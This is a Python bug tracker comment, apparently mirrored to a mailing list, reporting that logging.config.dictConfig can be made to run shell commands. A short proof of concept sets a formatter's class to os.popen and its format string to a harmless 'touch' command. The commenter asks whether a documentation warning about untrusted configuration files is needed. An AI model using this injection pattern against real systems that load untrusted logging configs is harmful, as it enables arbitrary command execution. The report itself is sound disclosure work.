Eric V. Smith <[email protected]> added the comment:
Actually, the last line isn't necessary.
------------
import logging.config
import json
log_config_txt = '''{
"version":1,
"formatters":{
"EXPLOIT":{
"class": "os.popen",
"format": "touch itworked",
"datefmt": "r",
"style": 1
}
}
}
'''
log_config = json.loads(log_config_txt)
logging.config.dictConfig(log_config)
------------
I suspect the answer to this will be: "don't load untrusted configuration
files". But I'll see what others have to say. There should probably be a
warning about it somewhere. I didn't see anything.
----------
_______________________________________
Python tracker <[email protected]>
<https://bugs.python.org/issue46251>
_______________________________________
_______________________________________________
Python-bugs-list mailing list
Unsubscribe:
https://mail.python.org/mailman/options/python-bugs-list/archive%40mail-archive.com
